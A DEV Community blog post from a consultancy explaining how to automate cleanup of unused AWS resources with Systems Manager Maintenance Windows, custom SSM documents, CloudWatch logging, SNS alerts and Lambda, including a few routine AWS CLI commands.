DEV Community

Cover image for How to Automate AWS Resource Cleanup with AWS Systems Manager in the vast expanse of cloud computing
Sidra Saleem for SUDO Consultants

Posted on • Originally published at

How to Automate AWS Resource Cleanup with AWS Systems Manager in the vast expanse of cloud computing


There is no need to explain the importance of cloud computing in the digital world. But with all these things comes other things as well. The importance of resource cleanup cannot be ignored when following the cloud computing approach. Neglecting this task will only lead to cluttered environment and spiraling costs. It is bizarre to think that you cannot save money when using cloud computing. Guess what, you can save a lot if you follow the optimization steps properly.

AWS doesn’t stay behind and offers its customers a service which will help them in automating operational tasks across its resources along with a secure, organized and cost-effective cloud environment. The service is none other than AWS Manager. There are many advantages of using this service like the cleanup process of unused resources is automated, cost leakage is also prevented and the environment stays efficient.

Understanding AWS Systems Manager

If you want to minimize the cost of your resources and optimize their performance then there is nothing better than using AWS Systems Manager. This service stands out to be a robust service of AWS as it provides developers and system administrators the necessary tools that they will require to manage and monitor the AWS resources.

AWS Systems Manager Capabilities

AWS System Manager offers features that are designed to facilitate the centralized management of your AWS resources. However, these categories can be organized into different areas where each area addresses a specific aspect of the resource management.

  • Systems manager makes sure that it provides you a detailed visibility into EC2 instances created on AWS along with on-premises servers. Following this you can secure your compute resources by administrating them remotely. Execution of scripts, collection of inventory and management of patches are all included in it.
  • AWS System Manager also simplifies the deployment and maintenance process of your applications across AWS environments. Moreover, it helps to keep your software updated and make it run as expected.
  • Using this service, you can even track the configuration compliance of your resources with the desired configurations. This is important for maintaining the compliance and security standards.
  • Moreover, you can also monitor and perform a diagnosis of your AWS resources. It offers and supports automated actions in response to specific conditions or events.
  • Last but not the least, System Manager Parameter Store also provides a centralized store that lets you manage the configuration data (plain as well as encrypted).

Utilizing AWS Systems Manager for Resource Management and Automation

You can use AWS Systems Manager’s powers for effective resource management and automation in many ways.

  • Automatic patches are applied for on-premises servers and AWS resources to make sure that the systems present are up to date along with latest security updates.
  • To maintain consistent configurations across AWS environment, you will have to use State Manager which is a feature of Systems Manager. It will automatically apply changes or fixes as required.
  • Make use of Systems Manager in order to automate the cleanup process of unused resources such as EBS volumes, EC2 instances and RDS instances.

All in all, AWS Systems Manager is indeed a helpful tool used for the management of AWS resources. Its capabilities allow organizations to ensure compliance, streamline the operations and automate the routing tasks.

Preparing Your AWS Environment for Automation

If you want to use the full potential of AWS Systems Manager in order for resource cleanup and other operational tasks then you need to prepare the AWS environment carefully. This process involves setting up and allowing necessary permissions, configuring the SSM (Systems Manager Agent) and organizing your resources effectively.

Setting Up Necessary Permissions: IAM Roles and Policies for Systems Manager

  • If you want Systems Manager to perform various operations on your behalf then you need to create IAM roles with some necessary permissions. Pre-defined policy templates provided by AWS grants the Systems Manager all the necessary permissions required to manage the instances.
  • Make sure your EC2 instances have IAM role with necessary and appropriate policies attached. This will help in secure communication between instances and Systems Manager.
  • In case you want your IAM policies to provide more control over the Systems Manager dos and don’ts, you can create custom IAM policies.

Configuring Systems Manager Agent (SSM Agent) on Your Instances

  • SSM Agent is a software that should be installed on your EC2 instances and on-premises servers to allow Systems Manager to handle the management. Majority of Amazon Machine Images (AMIs) come with pre-installed SSM agent.
  • Make sure that SSM Agent is properly installed on your instances. If SSM Agent is not installed then you can consult AWS documentation where detailed instructions are present regarding its installation and updating.
  • You need to be sure of this thing that SSM Agent is running so that proper communication can be made with Systems Manager. If the case is otherwise then change the status of SSM Agent to running using CLI or Systems Manager itself.

Best Practices for Organizing Resources for Effective Management

For every AWS resource there is a tag associated with it which acts like a key-value pair. These tags are beneficial as they provide flexibility in organizing your resources in such a way that they get align with your billing and operational practices. You can even use tags to indicate ownership.

In case there is a collection of resources sharing one or more tags, you can use AWS Resource Groups for managing and automating tasks. Managing tasks become easier when alike resources are grouped.

Structure your resources hierarchically by using a combination of accounts, SCPs (Service Control Policies) and OUs (Organizational Units) within AWS Organizations. This structure helps in the application of operational policies and governance.

Prepare your AWS environment as stated if you want to automate operations using AWS Systems Manager. Enable all the necessary permissions, configure the instances with SSM Agent correctly and organize your resources efficiently if you want to benefit the most from Systems Manager.

Automating Resource Cleanup with Maintenance Windows

Bringing automation in resource cleanup process is important for efficient management and cost-effective AWS environment. AWS Systems Manager Maintenance Windows offer a smart way using which you can schedule and automate the cleanup tasks. Moreover, it is ensured that they perform regularly and without involving any type of manual interference.

Introduction to Maintenance Windows in Systems Manager

Maintenance Windows as the name suggests define specific time windows for carrying out different maintenance tasks related to your AWS resources. These tasks include software updates, software patches and resource cleanup. The execution timing of these tasks is set in such a way that your environment will remain optimized and no critical services will be disrupted.

Step-by-Step Guide to Creating a Maintenance Window for Resource Cleanup

Create a Maintenance Window

  • Go to AWS Systems Manager Console and navigate to Maintenance Windows. Select the option saying “Create Maintenance Window” which will be present under Actions and Change.
  • Give name, specify schedule as well as duration for your maintenance window.

Register Targets

  • After you have created the Maintenance Window, register targets for cleanup by clicking on the option Register Targets.
  • Define the targets using tags. You can also manually select the resources, the choice is yours.

Assign Tasks to the Maintenance Window

  • Select “Assign Tasks” option and then choose Run Command. You can also choose “AWS-RunAutomationDocument” depending on the cleanup task.
  • You can either select the custom SSM documents or AWS-provided automation documents for cleanup.

Setting Up Automation Tasks Within the Maintenance Window

Using AWS-Provided Automation Documents

  • As told earlier, AWS offers pre-built Automation documents that are commonly used for cleanup tasks. This includes AWS-RemoveUnusedEBSVolumes or AWS-DeleteSnapshot.
  • When you are about to assign a task, search and select your preferred AWS-provided documents and also configure its parameters.

Creating Custom SSM Documents for Specific Cleanup Tasks

  • If the AWS-provided documents don’t meet your cleanup needs then you can create custom SSM Automation Documents as well.
  • Now head towards “Documents” which is present under Systems Manager shared resources. After this select the option saying “Create Document”. For the document type choose “Automation”.
  • Defining your automation steps will require you to use SSM document syntax. For instance, you can also write a script which will identify and delete the unattached EBS volumes which are present more than a certain number of days.
  • Use the custom documents when assigning tasks in Maintenance Window.

Following these steps will allow you to effectively automate the cleanup process of AWS resources. To assist here, Maintenance Windows in Systems Manager play a very vital role. Along with saving tons of money and resources you will be able to experience an efficient cloud environment.

Implementing Custom Cleanup Scripts

Understanding Systems Manager is not enough, you need to have the ability to write custom scripts as well. These scripts are mostly written in Python which utilize Boto3 AWS SDK. Their working involves targeting unused resources like ELB, EC2 instances, snapshots and EBS volumes for deletion. Now it is time to learn and explore about custom scripts, packaging them as SSM documents and executing them through System Manager using both AWS Management Console and AWS CLI.

Writing Custom Cleanup Scripts

Python and Boto3 for Resource Cleanup

Key components of a Python script using Boto3 for the purpose of finding and deleting unattached EBS volumes are:

  • Initialize the Boto3 client for EC2.
  • Utilize filters to identify resources not currently in use (e.g., EBS volumes with the status available).
  • Implement logic to delete the identified resources safely.

Script Considerations

  • Include confirmation prompts to prevent accidental deletion of any resources.
  • Implement logging to track the script's actions and outcomes.

Packaging Scripts as SSM Documents

Creating the SSM Document

  • Use AWS SSM Document for packaging your cleanup script.
  • SSM Documents assist in defining the actions that Systems Manager performs on your managed instances.

Document Format

  • SSM Documents can be written in YAML or JSON. Choose the format you prefer.

AWS CLI Command to Create an SSM Document

aws ssm create-document --content file://YourDocumentContent.json --name "CustomCleanupScript" --document-type "Command" --document-format JSON
  • Replace YourDocumentContent.json with the path to your own YAML or JSON file containing the SSM Document content.

Executing Custom Scripts through Systems Manager

Using the AWS Management Console

  • Head towards AWS Systems Manager Dashboard.
  • Navigate to Documents section and then select Create Document option.
  • Go for Command Document and paste the script that has been packaged as an SSM Document.
  • Specify a proper name and create the document.
  • After you have successfully created the document, select “Run Command” option.
  • For the newly created document specify the target instances and then execute the cleanup operation.

Using the AWS CLI

  • To execute your custom script on target instances, use the following CLI command:

aws ssm send-command --document-name "CustomCleanupScript" --targets "Key=instanceids,Values=instanceID1,instanceID2" --parameters commands=YourCommand
  • Replace "CustomCleanupScript" with the name of your SSM Document.
  • Replace "instanceID1,instanceID2" with the IDs of the instances you want to target.

If you follow these steps properly then you can use the automation features of AWS Systems Manager to create as well as execute custom resource cleanup tasks. After this you will experience an organized and cost-efficient AWS environment.

Monitoring and Logging

Another important aspect included in the automation of AWS resources is monitoring the operations and logging their outcomes. For this case, AWS CloudWatch has to be the perfect fit. It offers various tools which are needed to track down the performance of automation tasks including setting up notifications based on their outcomes as well as custom cleanup scripts.

Configuring CloudWatch Logs for Systems Manager Operations

Enable CloudWatch Logging for Systems Manager

  • Execution logs from Systems Manager are sent to CloudWatch. In order to enable the logging, you will have to attach an IAM role having CloudWatch permissions to EC2 instances or Systems Manager role.

Setting Up CloudWatch Log Groups

  • To create a dedicated CloudWatch Log Group for Systems Manager operations, there are two ways; AWS Management Console and AWS CLI.
aws logs create-log-group --log-group-name /aws/ssm/SystemsManagerLogGroup
  • Now what this log group will do is collect the logs from Systems Manager Operations along with the execution of custom cleanup scripts.

Monitoring the Execution of Cleanup Tasks

View Execution Logs in CloudWatch

  • After the logging has been enabled, you can use CloudWatch console to monitor the execution of cleanup tasks. You can also find the relevant Log Group and review the log streams for task execution details.

Utilize Systems Manager Run Command History

  • With so many other things, Systems Manager also provide a history of commands which are sent through the service. It also includes execution of cleanup tasks. The history informs regarding the success or failure of each task.

Setting Up Alarms and Notifications for Automation Task Outcomes

Create CloudWatch Alarms Based on Log Metrics

  • Another feature that you can use is CloudWatch Alarms. You can create and set these alarms based on log patterns or specific metrics from Systems Manager operations. For example, you can set up alarm for failed cleanup tasks by identifying the related error patterns in the logs.
  • You can enable the notification via Amazon SNS.

Configuring SNS Notifications

  • It is time to create an SNS topic dedicated to receiving notifications about Systems Manager task outcomes.
  • Subscribe your SMS number or email address to the SNS topic for receiving notifications.
  • To automate the notification process, link the SNS topic to your CloudWatch Alarm.
aws sns create-topic --name SystemsManagerNotifications
  • For real time notifications on task executions, attach the topic to CloudWatch alarm.

Following this approach will make you familiar with proactive management and allowing you to identify the issues more quickly in order to maintain the optimal performance of your AWS operations.

Security and Compliance Considerations

Security and compliance cannot be ignored when automating resource cleanup in AWS. To take care of these factors you need to come up with a strategic approach. This section highlights best practices for maintaining security and compliance throughout the automation process.

  • Make sure to implement the principle of least privilege by giving away only the necessary permissions for the execution of each task.
  • Store SSM Documents and custom scripts securely with the help of AWS Secrets Manager or Systems Manager Parameter Store. You will need access keys to access this sensitive information.
  • First understand and then define data retention policies that align perfectly with the compliance requirements. Make sure to implement safeguard scripts to prevent accidental deletion of resources.
  • Conduct regular audits and reviews of your automated cleanup processes.
  • Maintain a well-formatted document of automated processes including the permission required, rationale for specific cleanup tasks and impact on compliance.

Advanced Strategies for Cleanup Automation

If you want to automate the cleanup in AWS without the manual triggers or scheduled tasks then it is indeed possible! You just need to incorporate the advanced strategies that uses broader AWS eco-system. This section deals with the usage of AWS Lambda for event-driven cleanup along with the integration of Systems Manager with other services offered by AWS.

Leveraging AWS Lambda for Event-Driven Cleanup

  • AWS Lambda allows you to run the code whenever any change occurs such as change in state or time. This capability can be used to start the cleanup tasks automatically when certain conditions are met.
  • Identify the events that indicate the resources which are ready to experience a cleanup like TerminateInstances or DeleteDBInstance.
  • Now write Lambda functions in whatever language you prefer so that cleanup task can be performed.
  • Configure the Lambda functions in such a way that they get triggered by AWS services events.
  • AWS Lambda will perform the cleanup process at its earliest so that no extra charges are to be paid. It also provides the advantage of auto-scaling.

Integrating Systems Manager with Other AWS Services

AWS CloudFormation allows you to describe the infrastructure resources in your cloud environment. By integrating AWS Config and Systems Manager, you can automate the actions like cleanup tasks. Another service, AWS Service Catalog allows the organizations to manage and create catalogs of IT services. By using these event-driven mechanisms along with AWS Lambda and performing the integration of Systems Manager with AWS Config and CloudFormation, you can achieve a much more efficient resource cleanup process.


In this article we have explored the automation of AWS resource cleanup using AWS Systems Manager. All the critical steps and strategies which are required for a cost-effective cloud environment have been explained above in detail. Organizations and companies of all sizes are encouraged to explore and implement the automation strategies for AWS resource cleanup process.

Top comments (0)